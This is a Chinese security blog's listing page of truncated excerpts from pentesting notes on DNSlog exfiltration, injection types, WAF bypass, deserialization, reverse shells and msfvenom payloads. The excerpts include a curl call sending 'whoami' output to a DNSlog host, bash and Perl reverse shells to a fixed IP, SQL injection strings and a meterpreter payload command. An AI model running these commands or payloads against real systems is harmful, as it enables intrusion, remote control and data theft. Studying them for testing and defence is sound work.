摘要: DNSlog 1.原理 通过恶意payload组合的三级域名后对服务器发起的DNS请求。 2.利用场景 SQL注入 RCE(远程命令执行) SSRF(服务端请求伪造) RFI(远程文件包含) 3.Payload example curl http://huanxin.ceye.io/`whoami` ping ` 阅读全文
posted @ 2023-02-26 22:35 cowpokee 阅读(43) 评论(0) 推荐(0) 编辑
摘要: JSON注入 JSON注入原理: JSON注入是指应用程序所解析的JSON数据来源于不可信赖的数据源,程序没有对这些不可信赖的数据进行验证、过滤,如果应用程序使用未经验证的输入构造 JSON,则可以更改 JSON 数据的语义。在相对理想的情况下,攻击者可能会插入无关的元素,导致应用程序在解析 JSON数据时抛出异 阅读全文
posted @ 2023-02-26 22:34 cowpokee 阅读(236) 评论(0) 推荐(0) 编辑
摘要: Linux-反弹Shell /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 /bin/sh -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_ 阅读全文
posted @ 2023-02-26 22:33 cowpokee 阅读(33) 评论(0) 推荐(0) 编辑
摘要: CRLF注入 CRLF注入原理: 一个HTTP请求报文由四个部分组成:请求行、请求头部、空行、请求数据。 请求行和请求头的尾部都有CRLF标志,请求头和请求体之间也是通过CRLF标志分割的。 CRLF注入漏洞就是利用Http的这种报文结构,向请求行或请求头的字段注入恶意的CRLF,就能注入一些首部字段或报文主体( 阅读全文
posted @ 2023-02-26 22:32 cowpokee 阅读(221) 评论(0) 推荐(0) 编辑
摘要: 文件包含 条件:开启fopen 和 include lallow_url_include 是否允许引用URL文件 lallow_url_fopen 是否允许打开URL文件 危害:利用远程文件包含漏洞,可以直接执行任意命令。 **注意:在****php.ini中,allow_url_fopen默认一直是on,而 阅读全文
posted @ 2023-02-26 22:31 cowpokee 阅读(63) 评论(0) 推荐(0) 编辑
摘要: 安全狗Bypass 安全狗Bypass No.1 内联注释(/*![12345]*/)绕过方法: /*!select*/: 相当于没有注释 /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。 /*![]*/: []中括号中的数字若填写则必须是5位 1 阅读全文
posted @ 2023-02-26 22:30 cowpokee 阅读(25) 评论(0) 推荐(0) 编辑
摘要: XXE注入 XXE 有回显利用方式总结 结合外部实体声明(实体名称 SYSTEM ”uri/url“)和参数实体(% 实体名称 SYSTEM “uri-外部dtd”)有两种方式进行注入攻击 姿势一 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <! 阅读全文
posted @ 2023-02-26 22:30 cowpokee 阅读(19) 评论(0) 推荐(0) 编辑
摘要: SQL Server注入 SQLServer有三个权限级别: sa权限:数据库操作,文件管理,命令执行,注册表读取等system。SQLServer数据库的最高权限 db权限:文件管理,数据库操作等权限 users-administrators public权限:数据库操作 guest-users 判断是否是SA权限 sel 阅读全文
posted @ 2023-02-26 22:27 cowpokee 阅读(89) 评论(0) 推荐(0) 编辑
摘要: PHP反序列化 用户数据在$_SESSION中存储,当用户数据过大,内存占用过大,为了节省内存,选择把用户数据存储在文件中,即使用serialize()函数把用户数据存储到文件中,在使用的时候,在通过unserialize()函数调用 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过 阅读全文
posted @ 2023-02-26 22:26 cowpokee 阅读(13) 评论(0) 推荐(0) 编辑
摘要: Oracle注入 获取数据库版本 union select 1,'a',(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%25') from dual -- + 获取操作系统版本 union select 1,'a',(SELECT banner FROM 阅读全文
posted @ 2023-02-26 22:25 cowpokee 阅读(42) 评论(0) 推荐(0) 编辑
摘要: Mysql注入 查数据库 union select null,schema_name,null from information_schema.schemata limit 1,1%23 查数据表: union select 1,table_name,3 from information_schema.tables 阅读全文
posted @ 2023-02-26 22:24 cowpokee 阅读(14) 评论(0) 推荐(0) 编辑
摘要: msfvenom常用payload命令 windows: msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 - 阅读全文
posted @ 2023-02-26 22:21 cowpokee 阅读(52) 评论(0) 推荐(0) 编辑